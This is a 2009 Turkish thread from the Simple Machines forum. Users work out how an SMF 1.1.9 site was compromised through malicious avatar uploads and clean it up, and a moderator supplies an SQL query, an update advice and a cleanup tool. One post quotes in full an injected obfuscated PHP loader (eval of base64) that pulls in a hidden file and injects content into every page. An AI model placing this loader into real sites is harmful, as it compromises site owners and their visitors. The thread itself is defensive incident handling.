1.1.9 Açık mı Kapatıyor Açık Mı Yaratıyor?

Sami Ekici · toukokuu 24, 2009, 08:27:41 AP

Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.

ÿØÿá�¼Exif��II*��1��J��2��f��i��z��ACD Systems Digital Imaging�2008:11:22 03:08:16��0220��515� �� ÿş'00ÿÛ�C� ÿÛ�C ÿÀ��!�ÿÄ�� ÿÄ�µ��}�!1AQa"q2��¡#B±ÁRÑğ$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ�� ÿÄ�µ��w�!1AQaq"2�B�¡±Á #3RğbrÑ $4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚâãäåæçèéêòóôõö÷øùúÿÚ��?�ıS¢�?ÿÙ

3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor

Gurbet_42 · toukokuu 24, 2009, 08:45:23 AP

Firefox'ta sorun yok...

İe 8'de de sorun yok...

turanordusu.tc · toukokuu 24, 2009, 08:22:09 IP

Lainaus käyttäjältä: SA(^_^)Mi - toukokuu 24, 2009, 08:27:41 AP
Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.

3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor

Hocam sizin bilgisayarda virüs var sanırım ve 3 sitenin de index dosyalarından birine bulaşmış ftp açık olduğu için.

1.1.9 açık kapatmak için tabiki ama sizde bir sorun var yani. index dosyalarında bunları arayıp silmeniz lazım.

Gurbet_42 · toukokuu 25, 2009, 06:57:23 AP

Lainaus käyttäjältä: turklerinneti.com - toukokuu 24, 2009, 08:22:09 IP
Lainaus käyttäjältä: SA(^_^)Mi - toukokuu 24, 2009, 08:27:41 AP
Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.

3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor
Hocam sizin bilgisayarda virüs var sanırım ve 3 sitenin de index dosyalarından birine bulaşmış ftp açık olduğu için.
1.1.9 açık kapatmak için tabiki ama sizde bir sorun var yani. index dosyalarında bunları arayıp silmeniz lazım.

Virüs mü? valla bende hiç bir uyarı falan vermedi, gerçi farklı korumalar kullanıyoruz olabilir.

husmen73 (Gulhin) · toukokuu 25, 2009, 01:43:56 IP

Aktif etmeye çalıştığın temada virüs kodları var.

[SiNaN] · toukokuu 25, 2009, 02:33:22 IP

Tam olarak değil. Siz güncellemeden önce forumunuzda "hack" girişimi olmuş.

Bu sorguyu phpMyAdmin'den çalıştırın:

SELECT *
FROM smf_themes
WHERE ID_THEME = 32

Çıkan sonuçta ID_MEMBER sütunundaki üye idlerini yasaklayın.

value sütunundaki şu şekilde bir veri göreceksiniz: ./attachments/avatar_***.gif. O dosyaların hepsini attachment dizininden silin.

Son olarak da ilk çalıştırdığınız sorgu ile çıkan sonuçları silin.

turanordusu.tc · toukokuu 25, 2009, 03:01:19 IP

Sinan hocam bunlar değerli bilgiler. Şimdi bana da geçen gün böyle bir saldırı oldu sanırım ve ancak hosting düzeltebildi gece. Forum yavaş yavaş yok oldu. Ben şimdi şunları sormak istiyorum ;

1- Bu kodlar hangi dosyalara bulaşıyor bu tür saldırı durumunda.

2- Bu saldırıları önlemek için bizim yada hosting şirketinin yapabileceği bişey varmıdır ?

3- Bunu yapanın ip numarasını (saatini tahmin edebilirsek) nasıl bulabiliriz ?

4- Siteye ne tür saldırı yöntemleriyle saldırı olur ? Mesela virüs bulaştırma, sürekli bir saldırıyla trafik alanını bitirme vb.gibi. Bunlar benim tahminlerim.
Çünkü diğer arkadaşlar da burada zaman zaman bu tür saldırılara uğradıkları için yazıyor ve bence bilgi sahibi olmayı herkes ister sanırım.

Bu konularda bizi biraz aydınlatabilirseniz çok memnun oluruz. Teşekkürler.

Sami Ekici · toukokuu 25, 2009, 04:03:13 IP

Sorguyu çalıştırdım. karşıma 1 Sonuç Çıktı. O üyeyi Buldum Yasakladım Avatar yükleyememş sanırsam çünki attachments içinde avatarını bulamadım. Ki Zaten

Forumu 1.1.9 ile sıfırdan kurmuştum hatayı gideremeyince. Diğer sitenin TÜM .php dosyalarında

Koodi [Valitse]

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9nb3R1cmtleS9wdWJsaWNfaHRtbC9vbmtpc2kuY29tL1RoZW1lcy9TYXRlbGxpdGUvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2dvdHVya2V5L3B1YmxpY19odG1sL29ua2lzaS5jb20vVGhlbWVzL1NhdGVsbGl0ZS9pbWFnZXMvYnV0dG9ucy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

bu kodu buldum hepsini tektek silmekle uğraşmak yerine 1.1.9 U sıfırdan kuracağım birazdan daha güvenli olur.

Birde bu siteler farklı farklı hostlarda bu beni bilerek mi yapıyor anlamış değilim :S
Nasıl giripte kaynak kodlarına kadar base64 kodu yerleştirdi onuda anlamadım adamın siteye üye olası ile çıkması bir olmuş zaten. Amacı Neyse artık $:-\$

http://www.smf.pl/forum/index.php?topic=4857.0

burdaki adamada aynı ip den aynı kişi aynı şekilde aynı kodu eklemiş :S

Bundan Sonra Ne Yapamam Gerekiyor

edit: Resim ekledim. Bu Sanırım Bot. her 2 sitede'de aynı üye adı adı IP ve maile sahip.

Yağız... · toukokuu 25, 2009, 04:14:47 IP

Evet, o

O üyenin IP'sini banlayıp silin.

Sami Ekici · toukokuu 25, 2009, 04:16:46 IP

tamamen banladım silmeye gerek yok ta bu adımdan sonra bişey yapmam gerekmiyor sanırım ?

Yağız... · toukokuu 25, 2009, 04:18:49 IP

Eğer dosyaları temizlediyseniz, hayır.

Sami Ekici · toukokuu 25, 2009, 04:25:29 IP

Sinan Hocamın Deikleri İle birlikte tüm dosyalarıda temizledim Bu arada Yorum, Görüş ve önerilerde Bulunan arkadaşlara teşekkür ederim Sinan Hocama Ayriyeten Teşekkürler..

Gurbet_42 · toukokuu 25, 2009, 04:33:56 IP

Stop forum spam modu kurulu olsaydı bu üye olamazdı, çünkü e-maili stopforumspam.com sitesinde kayıtlı.

Sami Ekici · toukokuu 25, 2009, 04:37:09 IP

ya zaten botlar gelip duruyodu güvenli resim doğrulaması koydum bot kayıt olamamaya başladı sonra güvenliği kaldırdım olan oldu işte : ) Hayırlısı Bakalım

turanordusu.tc · toukokuu 25, 2009, 04:44:07 IP

Bende Stop forum spam modu kurulu. O zaman korkmama gerek yok sanırım. Çünkü bugün dikkat ettim hiç yabancı üye yok gelmemiş kimse

[SiNaN] · toukokuu 26, 2009, 04:26:19 AP

Lainaa1- Bu kodlar hangi dosyalara bulaşıyor bu tür saldırı durumunda.

Her dosyanıza bulaşmış olabilir. Bütün dosyalarınızı yenilemenizi tavsiye ederim. 1.1.9 ve 2.0 RC1-1 sürümleriyle bunların hepsine karşı önlem alınmış oldu.

Lainaa2- Bu saldırıları önlemek için bizim yada hosting şirketinin yapabileceği bişey varmıdır ?

Sisteminizi güncel tutmak. En yeni sürümlere güncelleme fırsatı bulamayanlar için avatar ve eklenti sistemini 1.1.9 ve 2.0 RC1-1 sürümüne güncelleyene kadar kapalı duruma getirmek. Güncellediyseniz sorun yok.

Lainaa3- Bunu yapanın ip numarasını (saatini tahmin edebilirsek) nasıl bulabiliriz ?

Sunucu erişim kayıtlarında (access logs) arayabilirsiniz ama çok zaman geçtiyse bulmanız biraz zor olabilir.

Lainaa4- Siteye ne tür saldırı yöntemleriyle saldırı olur ? Mesela virüs bulaştırma, sürekli bir saldırıyla trafik alanını bitirme vb.gibi. Bunlar benim tahminlerim.

Her türlü saldırı olabilir. Sitenize virüs bulaşması sizinle alakalı birşey. Yani bilgisayarınıza bulaştıysa, siz onu sitenize de bulaştırıyorsunuz. Bunun dışında genelde saldırılar daha çok hostunuzu ilgilendirecek alanlarda olur. SMF'i ilgilendiren bir açık mevzuu bahis olduğunda en kısa zamanda güncellemeler yayınlanıyor zaten. Yani dediğim gibi, sisteminizi güncel tutmalısınız.

----

Ayrıca sitesine krisbarteo üye olan arkadaşlara tavsiyem dosyalarının temiz olduğunu kontrol etmeleri. Kendisi bir süredir SMF forumlarını hedef alan saldırılar düzenliyor ve son sürümlere güncellemeden önce size de uğradıysa dosyalarınızda istemeyeceğiniz kodlar eklenmiş olabilir.

turanordusu.tc · toukokuu 26, 2009, 04:43:05 AP

Sinan hocam verdiğiniz bilgiler için çok teşekkürler. 1.1.9 sürümüne güncellemiş durumdayım zaten inşallah böyle bişey tekrar olmaz ama olduğunda da virüs kodlarını öncelikle index dosyalarında aramamız gerekiyor sanırım ?
index.php , index.htm , index.html , bordindex.php , Bordindex.template.php vs. gibi.

[SiNaN] · toukokuu 26, 2009, 04:48:11 AP

Virüs sorununu bizzat yaşamadığım için o konuda net bir bilgim yok. Ama ben bu durumda olsaydım hiçbir dosyama güvenmezdim.

turanordusu.tc · toukokuu 26, 2009, 04:56:12 AP

Doğru sözlüyorsunuz ama kurulu o kadar çok mod varki

Hepsini yenileyip geri kurmam en az bir ayımı alır benim.

Dosyayı antivirüs ile taratınca bunları silmez mi yoksa manuel olarak dosyanın içinde kendimiz mi arayıp bulmamız lazım bu değişik olan karekterleri yani virüs kodlarını ?

[SiNaN] · toukokuu 26, 2009, 05:11:48 AP

SA(^_^)Mi'nin bahsettiği kodlar krisbarteo'nun işi. Bu kodları temizlemek için şuradaki aracı kullanabilirsiniz:

http://www.simplemachines.org/community/index.php?topic=313201.0

Fakat her dosyaya 'iframe' kodları ekleyen virüsden bashediyosanız, dediğim gibi onun hakkında fazla bir bilgim yok.

Simple Machines Community Forum

Uutiset:

1.1.9 Açık mı Kapatıyor Açık Mı Yaratıyor?

Sami Ekici

Gurbet_42

turanordusu.tc

Gurbet_42

husmen73 (Gulhin)

[SiNaN]

turanordusu.tc

Sami Ekici

Yağız...

Sami Ekici

Yağız...

Sami Ekici

Gurbet_42

Sami Ekici

turanordusu.tc

[SiNaN]

turanordusu.tc

[SiNaN]

turanordusu.tc

[SiNaN]